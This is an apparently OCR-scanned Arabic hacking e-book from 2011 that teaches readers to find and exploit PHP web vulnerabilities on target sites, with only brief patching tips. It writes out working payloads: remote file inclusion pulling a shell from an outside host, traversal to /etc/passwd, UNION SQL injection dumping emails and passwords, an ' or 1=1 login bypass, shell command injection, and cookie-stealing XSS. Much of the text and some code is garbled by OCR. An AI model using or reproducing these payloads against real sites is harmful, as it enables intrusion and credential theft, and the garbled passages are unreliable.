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مقدمة: 


كثيرا ما نسمع عن لغة البرمجة ۲۳١1۲‏ و أنواع الثغرات المحتملة و التي تمكننا من اختراق الموقع 
المصاب. 

وحين نفكر في هذا المجال حتما نصل إلى فكرة أن الثغرة مهما كان نوعها أو برمجتها. فان 
اكتشافها هو أمر صعب و بالغ التعقيد... 


- في الكثير من المرات و أنا أتصفح مواقع الهكر أحد أن هناك الكثير من المختصين في هذا 
المجال للآأسف ر٫<:“رون‏ المعلومات خاصة فیما یتعلق بثغرات ال ٥۸۲‏ فغالبا یكتفون بشرح 
الاستغلال و يتجاهلون شرح طريقة الاكتشاف. 

إذن من الآن فصاعدا لا تستنجد أو تطلب المساعدة من أحد لكي تكتشف و تستغل الثغرات. 


لأنني في هذا الكتاب سأشرح كيفية اكتشاف الثغرة و استغلالها.. 
وسيكون الشرح مدعوما بأمثلة أساسية و أمثلة متقدمة نوعا ما . 


1) الأدوات التي نحتاحجها 


المطلوب منا في هذه الخطوة الأولى هو تثبيت برنامج يدعم ۲۴١۲‏ و 5Q1‏ أي تثبيت ما يعرف 
بالسرفر المحلي (الخادم المحلي) 10٤۸1۳10S١‏ على جحهزنا. 

يمكنك تثبیت برنامج WA N۴‏ أو APPSERVE‏ على سبیل المثال . بعد التثبيت يجب اجحراء بعض التعديلات 
البسيطة على الخادم المحلي وذلك بتعديل ملف التكوين ".مم لأن أغلب الاستغلالات تحتاج الى 


شروط لتطبيقها بالشكل الصحيح. 
ابحث عن المعلومات التالية في ملف ا١أ.م‏ م و عدلها بحيث تكون كما يلي : 


safe_mode = off 
register_globals = on 
allow_url_include = on 
allow_url_fopen = on 
magic_quotes_gpc = off 
short_tag_open = on 
display_errors = on 
disabled_functions = N/A 


بعد التعديل يجب اتباع الخطوات الاتية : أولا » إنشاء قاعدة بيانات لاستخدامها من قبل مختلف برامح ال 
۴ أو ما یعرف بالسکربتات . 
ثانيا » ثبت سكربتات مختلفة و ابدء في دراسة مصدرها -أكوادها- وقم باختبارها بواسطة المتصفح. 


http://www.the-code.tk/code.php?id=96 :li lazi APPSERVE gÎ WAMP جمliرڊ‎ Jيمحت روابط‎ 


- أنت الان تتسائل : كيف يمكنني دراسة هذه السكربتات؟ ...أنا لا أعرف شينا حول الثغرات!!! 
أقول لك لا تقلق هيا ننطلق الى عالم اكتشاف التغرات و أكيد..استغلالها. 


2) ثغرة usio۸اInc Remote File‏ (استدعاء أو ادراج ملف بعید): 
دور هذه الثغرة واضح حدا بحيث أنها تمكنك من استدعاء ملفات خارحية والتي غالبا ما تكون شلات أو 
سكربتات اختراق بالنسبة للمهاحم. 


- كما أنها تعتبر من اخطر الثغرات ولكنها حاليا نادرة وذلك لتفطن المبرمجين اليها. 


في لغة ال P٣۲‏ توحد تلات دوال یمکنھا أن تترحم عملية استدعاء الملف و التي قد تحدن التغرة وهى : 
require — require()‏ 
require_once‏ 


include 
include_once 


1-2 -- متال أساسي عن كود الثغرة: 
-- لنفرض أن لدينا ملف مطم.اءه] يحوي الكود التالي: 
<?php‏ 
$pagina=$_GET['pagina'];‏ 


include $pagina; 
27> 


لنشرح الكود باختصار .الدالة ٥ںاہ‏ تستدعي المتغير i"2وةم‏ و المتغير في لغة ۴۳٣۲۶‏ دائما يكون 
مسبوقا برمز الدولار $ (عليك أولا أخي أن ترحع الى بعض اأساسیات )۲٥٣۸۲‏ 

- إذا قمنا برقع الملف و تصفحه بمتصغفح الانترنت pص¬http://127.0.0.1/test.5h‏ 

سنلاحظ وحود عدة أخطاء في الصفحة : 


مثل هذا الخطأ (أنا أستعمل خادم :)WA۷۲‏ 


Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2 


-سبب الخطأً هو أن المتغير ١2‏ أوةم لا يزال مجهولا أو غير معرفا بالنسبة للدالة مأuاءما.‏ 
والاستغلال يكون عندما نعطي المتغير قيمة نحددها نحن و التي تكون رابطا للشل أو سكربت الاختراق 
ويكون هذا بواسطة المتصفح وبهذا الشكل: 


http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt? 
لا تنسى أن الشل الذي تم استدعاءه يجب أن يكون بصيغة ملف نصي ۲×۲ و أيضا من المهم وضع‎ 
. علامة الاستفهام في نهاية الرابط‎ 


الكثيرون يتسائلون لماذا يجب وضع علامة الاستفهام ؟ أو 00 + في نهاية رابط الاستغلال؟ 


-الاحابة ستكتشفها من خلال هذا المنال: 


<?php 
$pagina=$_GET['pagina']; 
include $pagina.'.php'; 
2> 


-- اذا استدعينا الشل (بدون وضع علامة الاستفهام : 


http://127.0.0.1/test.php?pagina=http://the-code.tk/evilscript.txt 


لن ينجح لأن الاستدعاء سيشمل النص‌ ضhضevilscript.txt.p http: / /the-code.tk/‏ 


لذلك سوف نضيف > 00 أو علامة الاستفهام ؟ بعد رابط الاستغلال لكي يتم تجاهل الرموز و الاضافات 
التي تكون بعد المتغير المستدعى وبالتالي ستنجح عملية الربط او الادراج وسيظهر الشل. 


2-2 -- متال متقدم عن كود التغخرة: 
الآن متال من سکربت. 


- مقتطف من الكود المصاب ( ملف مpطم.>مind):‏ 


if (isset($_REQUEST["main_content"])) { 
$main_content = $_REQUEST["main_content"]; 
} else if (isset($_SESSION["main_content"])) { 
$main_content = $_SESSION["main_content"]; 


ob_startO; 
require_once($main_content); 


يمكننا أن نستدعي الشل بواسطة المتغير "٤١٥ه†١”هء_”أجه""‏ و المهاحم عموما سيطلب أي قيمة 
بحددها للمتغير بغضل دالة الطلب R۸٤ QU ٤S۲‏ 
والاستغلال سيكون كالاتي: 

http://127.0.0.1/index.php?main_content= http://the-code.tk/evilscript.txt? 
وبالتالي سيتم استدعاء الشل بنجاح.‎ 


ملاحظة: بعض النصوص لا تقبل "۸1۲۲۲" یمکن أن نجرب استخدام "1۲۲۲۴5" أو بروتوکول نقل 
الملفات"۴۲۴P"‏ 


3-2 - كيفية الترقيع: 


طرق بسيطة : - لا تسمح باستخدام الرموز و العلامات مثل "/" في المتغيرات. 
-ابحث عن الأخطاء و حاول أن تجعل كل المتغيرات معرفة. 


3) تغرة File Inclusion / Download‏ اLoca‏ (کشف /فراءة / تحمیل ملف 


بكل بساطة فانه من خلال هذه الثغرة يمكنك قراءة محتوى ملغات الموقع المستهدف . و حتى تحميلها. 
بعض الدوال التي تسمح لك بقراءة الملغات : 
قراةة ملف كاملJ‏ : file_get_contents‏ 
قراءة ملف: عا read‏ 
قراءة ملف كامل مرة في مصغوقة : عاا؟ 


1 فتح ملف او رابط : ٣€٤pه؟‏ 
عرض سورس /محتويات-كود الصفغحة او الملف : highlight_file() - show_source‏ 


1-3 -- مثال أساسي عن كود الثغرة: 
-- لنفرض أن لدينا ملف مطم.اءها يحوي الكود التالي: 


<?php 
$pagina=$_GET['pagina']; 
readfile($pagina); 

2> 


لنشرح الكود باختصار . ستحاول الدالة ءماا؟dfدعإ‏ قراءة محتوى الملف المحدد بالمتغير 2١أ3ةم$‏ 
وبالتالىي فى الاستغلال سنقوم بتحديد مسار الملف المراد قراءته و المخترق بطبيعة الحال سيحاول 


قراءة الملغات المهمة و التي تحتوىي معلومات الاختراق متل ملف م٢م.وأ؟مه»‏ بالنسبة لمنتديات 
vBulletin‏ : 


الاستغلال سيكون بهذا الشكل: 


http://127.0.0.1/test.php?pagina=../../../../../etc/passwd 


وبالتالي سيتم طلب الملف للقراءة و ليس استدعاءه من الخارج.. 
وassNdم/etc/../../../../..‏ هي مسار الملف المراد قراءته ویتغیر حسب مکونات السکربت . 


2-3 -- متال متقدم عن كود التخرة : 


الآن متال من سكربت والملف المصاب يسمیى : download.php‏ 
- مقتطف من الكود المصاب: 


$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST[file']; 
header("Pragma: public"); 

header("Expires: 0"); 

header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); 


header("Content-Type: application/force-download"); 
header( "Content-Disposition: attachment; filename=".basename($file)); 


/Iheader( "Content-Description: File Transfer"); 


@readfile($file); 
die); 


المتغير ءا يعبر عن الملف المطلوب وهو غير امن وتم طلبه بواسطة _R۸ ٤Q۷ ٤S۲‏ $. الذي يظهر في 
السطر الأول. 

و عن طريق الدالة () ماا؟dأجمإ‏ يمكننا أن نرى محتوى الملف. 

و بالتالي الاستغلال یکون کالتالي : 


http://127.0.0.1/download.php?file=../../../../../../etc/passwd 


حتى نتمكن من قراءة الملف المطلوب بنجاح. 


3-3 - كيفية الترقيع: 


طرق بسيطة : - لا تسمح باستخدام الرموز و العلامات مثل "/" في المتغيرات. 
-ابحتث عن الأخطاء و حاول أن تجعل كل المتغيرات معرفة. 


4) تغرة ۸٥اtم‌زہ1 5Q1‏ (حقن قواعد البیانات): 


ان ثغرة ۸٥اا‌م‌زہ1 5Q1‏ هي الأكثر انتشارا و تعتبر الأصعب من ناحية الاستغلال كما أنها الأشهر 
هذه الثغرة لوحدها تستحق كتابا لشرحها بدقة و التدقيق في استغالالاتها بداية من تحديد الجداول 
والأعمدة المصابة وصولا الى استخراج البيانات و من تم المراحل المتقدمة و التي تمكنك من رفع 
الشل. 


1-4 -- مثال أساسي عن كود الثغرة: 
-- مقتطف من من ملف مام .stعt‏ 


<?php 

$id = $_GET['id']; 

$result = mysql_query( "SELECT name FROM members WHERE id = '$id"); 
2> 


كما نلاحظ فان المتغیر لاخ غير مغفلتر هذا يعني أننا يمكن أن نحقن أوامر ا50 التي نريدها 
قد تتسانل مالذي أقصده بغیر مغلتر؟ 


-غير مغلتر من الفلترة و هي أن الكود الذي نحقنه يمكن أن يكون أوامر ا50 ورموز مختلفة وليس أرقاما 
فقط وهذه الرموز بدورها تمثل أوامر توحه لقاعدة البيانات. 


- كيغفية الكشف عن وحود التغرة باختصار : 
الامر في غاية السهولة كل ماعليك هو اعطاء المتغير كأ$ قيمة تتمتل في رمز ' او عدة حروف و هذا ما 
يسبب خللا في قاعدة البيانات التي تستظهر لك الخطأً و الذي يمكن أن يكون بهذا الشكل: 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near 'ORDER BY ` date’ DESC' at line 1 
و رسالة الخطأً لها عدة صيغ أخرى.‎ 
-نعود الى كيفية الاستغلال ويكون كما يلي:‎ 


http://127.0.0.1/test.php?id=1+union+all+select+ 1,2,version(),4-- 


وهنا سنحصل على اصدار قاعدة البيانات (الاصابة في العمود رقم 3). 


2-4 -- متال متقدم عن كود التغرة : 


الآن متال من سكربت والملف المصاب يسمی : ضlisting_view.php‏ 
- مقتطف من الكود المصاب: 


$id = $_GET['itemnr']; 

require_once($home."mysqlinfo.php"); 

$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals 
where id=$id"; 

$result = mysql_query($query); 

if(mysql_num_rows($result)) { 

$r = mysql_fetch_array($result); 


نلاحظ أنه سيتم تحدبد قيمة المتغير $4 بواسطة الطلب ۲١.هع]|‏ والقيمة التي سنطلبها غير مغلترة . 
وبالتالىي سنتمكن من حقن ال ا5 بكل سهولة و ذلك كالاتي : 


http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+ 1,2, 
3,concat(Ox3a,email,password),5,6,7,8,9,10+from+users-- 


وسنحصل على البريد الالكتروني وكلمة المرور من الجدول المستخدمين. 


ملاحظة هامة: ١0آءعزم1 5Q1‏ هي من أعقد الثغرات لذا لا يمكنني الان أن أشرحها بالتفصيل الممل 
و ان شاء الله سأصدر كتابا كاملا حول هذه الثغرة وسيشمل كل تغفاصيل الاستغلال من تخطي الفلترة 
الى استخراج المعلومات وصولا الى رفع الشل. 


SQ) Injection Login Bypass --3-4‏ ( تجاوز تسجیل الدخول): 


هذه الثغرة تعتبر من أخف و أحمل الثغرات و ذلك لبساطتها لذلك صنفتها كجزء من ثغرة 5Q]‏ 
ctionعز1n‏ وهي تمكنك من الدخول الى لوحة الادارة مستعملا الرمز ۲'1=1ه0' 


رکز علی المتال: 
متال من سکربت والملف المصاب یسمی : مpطم.٣‏ اوها 


- مقتطف من الكود المصاب: 


$postbruger = $_POST['username']; 

$postpass = md5($_POST['password’]); 

$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND 
password = '$postpass'") 

or die("<p>" . mysql_error() . "</p>\n"); 


يمكننا تجاوز لوحة الدخول بمجرد وضع المعلومات التالية : 


اسم المستخدم : 1=1 ' admin ' or‏ 
كلمة السر: jocker‏ 
أكيد أننا سنقول كيف سيسجل دخولنا ؟ وهل سنخدع ا5 بهذه البساطة؟ 


الاحابة هي نعم لأننا لو لاحظنا الأمر الذي سيطبق من طرف ال 1ا@5 سنعرف السبب : 


$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND 


mm 


password = ' jocker'") 


- يجب أن تكون لديك فكرة عن طريقة التعامل مع قواعد البيانات لكي تتمكن من ترحمة الأمر الذي 
خدعنا به ال 501 وتمكنا من الدخول مچ العلم أن اسم الدخول يجب أن يكون اسم الهدف. 


4-4 - كيفية الترقيع : 


- لا تسمح للحروف في المتغيرات و احعلها فقط أرقاما باستخدام الامر هذا كمثال: 
Şid=(int)$_GET[id"];‏ 
-أو قم بمنع الحروف الخاصة والتي تحدث خللا لقاعدة البيانات : 


-,.)('" _+/* 


5) تغرة Remote Command Execution‏ (تنغیذ الآوامں): 


-هذه الثغرة تصنف حسب رأيي ثاني أخطر ثغرة بعد تغرة 0۸آئںا›"] عاا؟ Remote‏ وهي تسمح لك 
بتنفيذ اوامر مباشرة على السيرفر 


-في لغة ال ۲۳١۴‏ توحد بعض الدوال التي تسمح لك بتطبيق الأوامر وهي : 


exec 
passthru 
shell_exec 
system 


-- ملاحظة : إذا كان الاستغلال يتم عبر تطبيق الأوامر بدالة EX)‏ فانه لا يمكنك مشاهدة نتيجة 
الأوامر (ولكن يتم تنفيذ الأوامر) اذ أنها لا تطبع. 


5 -- مثال أساسي عن كود الثغرة: 
-- مقتطف من ملف م طم. st‏ 
<?php‏ 
$cmd=$_GET[cmd'];‏ 
system($cmd);‏ 
>7 


من خلال دراسة الثغرات السابقة عرفنا كيف يمكننا طلب قيمة للمتغير وهو في هذه الحالة $٣4١‏ 


ومنه يمكننا أن نجعل الاستغلال يتم كالأتي : 
http://127.0.0.1/test.php?cmd=id‏ 


وسيتم تنفيذ الأمر 4¡ (أمر عرض صلاحياتنا على السرفر) وسوف تظهر النتيجة. 
وفي حالة التجريب على السرفر المحلي سيكون الأمر من أوامر نظام الويندوز كالأمر ١ال‏ (استعراض 
ملغات المجلد الحالي). 
25 -- متال متقدم عن كود التغخرة : 
متال من سكربت والملف المصاب يسمى : مطم.واd‏ 
- مقتطف من الكود المصاب: 
$ns = $_GET['ns'];‏ 
$query_type = $_GET['query_type']; / ANY, MX, A , etc.‏ 
$ip = $_SERVER['REMOTE_ADDR!];‏ 
$self = $_SERVER['PHP_SELF'];‏ 
$host = strtolower($host);‏ 
echo("<span class=\"plainBlue\"><b>Executing : <u>dig $ns </u></b><br>");‏ 


echo '<pre>'; 
system ("$ns"); 


هنا يظهر أنه یمکن للمهاحم أن يوحه أي أمر یریده من خلال المتغیر $۸5 


و الأمر سيوحه بالشكل الاتي : 


http://127.0.0.1/dig.php?ns=|s -la 


-اضافة هامة : لو صادفنا كود بهذا الشكل: 


$dz = $_GET['ns1]; 
$alg = $_GET[alg]; . 


system ("dig @$dz $alg"); 
9> 
في رأيك کیف سیکون الاستغلال؟‎ 


الاحابة: الاستغلال سيكون بهذا الشكل: 


http://127.0.0.1/dig.php?dz=ll id Il&alg=1s -la 


لأن الرمز || يستخدم لتطبيق عدة أوامر في وقت واحد. 


:(JAVA SCRIPT ھsİ‎ HTML دlasİÎ‎ jaح)‎ Cross-Site Scripting öةرۈغتî‎ (6 


كثيرا ما يتجاهل المبرمجون هذه الثغرة أو يتناسونها ولهذا فهي منتشرة حدا و يمكن أن تجدها في أكبر 
المواقع العالمية لكن فعاليتها تكمن في قدرة المهاحم على استغلالها بطريقة ذكية. 


ومنه يمكننا أن نجعل الاستغلال يتم كالأتي : 


6 -- متثال أساسي عن كود الثغرة: 
-- مقتطف من من ملف مطم.اsعt‏ 
- مقتطف من الكود المصاب: 
<?php‏ 
$name=$_GET['name'];‏ 
print $name;‏ 
>7 


لو ترحمنا الكود فانه يتم طلب قيمة للمتغير $١٣3٣۴‏ ومن تم طباعته بواسطة الدالة ٤١م‏ 


- لنفكر حيدا في طريقة لاستغلال هذا الكود ....... ما رأيك لو نحقن كود حافا سكربت بهذا الشكل: 


http://127.0.0.1/test.php?name=<script>alert(document.cookie)</script> 


النتيجة ستكون ظهور نافذة رسالة حافا تحوي كوكيز المستخدم و هو الكوكيز الخاص بنا فقي هذه 
الحاله. 


- احد طرق الاختراق تتم عبر عملية تكوين رابط يحوي كود استخراج الکوكیز ثم تشفيره أو اختصاره 
وارساله الى الضحية . عند تصفح الضحية للرابط فان معلومات الكوكيز الخاصة به سترسل الى 
المهاحم و هذا الأخير يقوم بالدخول الى حساب الضحية مستغلا معلومات الكوكيز المسروقة. 


6 - كيفية الترقيع : 
طريقة الترقيع سهلة حدا حيث يمكننا استعماJ‏ دlJlة htmlspecialchars() ll ,Î htmlentities)‏ 
هذه الدوال تقوم بمعاملة نصوص و وسوم ا1۲M1‏ كنص عادي . 
وبالتالي الكود المرقع سيكون بهذا الشكل: 
php?>‏ 
;(['name=htmlentities($_GET['name$‏ 


;print $name 
<? 


7( تغخرةö ‡î + Download Backups‏ رة :INC files‏ 
1-7 - شرح +أمتثلة : 
شخصيا أعتبرهما من الأخطاء الساذحة للمبرمجين بحيث: 


تغرة Bac)u ps‏ oadاDown‏ : تسمح لك بتحميل النسخ الاحتياطية لقاعدة بيانات الموقع 
المستهدف. 


منال بسیط: 


http://127.0.0.1/adminpanel/phpmydump.php 


تغرة ءعاآ؟ 1۸٤€‏ : وتسمح لك بقراءة بعض ملغات ء١‏ والتي تكون مكشوفة و من الممكن أن 
تحوي معلومات الموقع المستهدف. 


مثال بسيط (قراءة ملف يحوي معلومات الاتصال بقاعدة البيانات): 


http://127.0.0.1/inc/mysq!.inc 


2-7 - طريقة الترقيع : 


Download Backups‏ : التحقق من أن المدير هو الذي يريد تحميل النسخة الاحتياطية و الا التحويل 
الى صفحة خطأً - استخدام حدار ناري لحماية النسخ الاحتياطية. 


كeاi؟f [NC‏ : حماية الملفات باستخدام ككعءعءهاا. والأفضل هو حفظ المعلومات في ملفات بصيغة 
„PHP‏ 


8 أمتلة حول الثغرات (من مواقع الحماية): 


Remote File Inclusion öةرۈغتû‎ (1 
http://www.1337day.com/ exploits/ 14932 
Local File Disclosure/ Download öةرۈغت‎ (2 
http:/ /WWW.1337day.com/ exploits/ 17087 
SQL Injection öةرۈغت‎ (3 

http:/ /WWW.1337day.com/ exploits/ 17021 


http:/ /WWW.1337day.com/ exploits/ 14836 
http:/ /WWW.1337day.com/ exploits/ 14828 


Remote Command Execution öةرغٹû‎ (4 


http:/ /WWW.1337day.com/ exploits/ 1503 


Cross-Site Scripting öةرۈغت‎ (5 


http:/ /WWW.1337day.com/ exploits/ 17073 


خاتمه: 


من المعروف أنه توحد عدة أنواع من الثغرات تختلف من حيث الخطورة و كيفية الاستغلال ولكن كل هذا 
يعتمد على قدرة المهاحم و ذكائه ,أخي لقد حاولت أن أقربك أكثر الى عالم التغرات و من المؤكد انه 
کلما احتهدت أكثر كلما وصلت الى مرحلة متقدمة من الاحتراف...و اعذروني ان وردت مني أخطاء على 
المستوى النحوي أو الاملائني أو على مستوى الشرح فالكمال لله عز وحل... 


لتعليقاتكم واقتراحاتكم واستغفساراتكم حول الكتاب أرحو 
مراسلتي عبر البريد الالكتروني: 


Madrido.Jocker@gymail.com 
أو يرحى زيارة الموقع‎ 

http://www.the-code.iKk 

أو التواصل عبر SKYPE‏ : 


Adel SBM 


أرحو الدعاء لي ولوالدي 


2011/10/3 


تم بحمد الله 


